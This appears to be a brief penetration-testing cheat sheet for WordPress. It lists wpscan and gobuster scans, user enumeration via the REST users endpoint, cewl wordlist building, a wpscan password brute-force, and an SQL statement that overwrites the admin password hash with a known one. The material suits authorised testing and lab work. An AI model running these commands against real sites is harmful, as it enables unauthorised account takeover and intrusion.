Skip to content

Wordpress

General scan

wpscan --url $(target)/wordpress/
wpscan --url $(target)/wordpress/ --api-token='...'

Directory enumeration

gobuster dir --url $(target) --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster_wordpress.raw

User enumeration

wpscan --url $(target) --enumerate u                   
curl $(target)/index.php/wp-json/wp/v2/users -s | jq '.[].slug' | sed 's\"\\g'

Passwords

cewl -w pass.lst $(target)/wordpress/ -d 1
cat pass.lst | uniq | sort | tr '[:upper:]' '[:lower:]' > pass2.lst

Inject password 'hacker'

UPDATE `wp_users` SET `user_pass` = '$P$BPNNFH6DCWFkvqe6CiUrKMXzu0cojQ1' WHERE user_login = 'admin';

Bruteforce login

wpscan --url $(target)/wordpress/ -U user.lst -P pass.lst

Search files that contain version

grep -R 5.9.2 /workspace/latest/source_code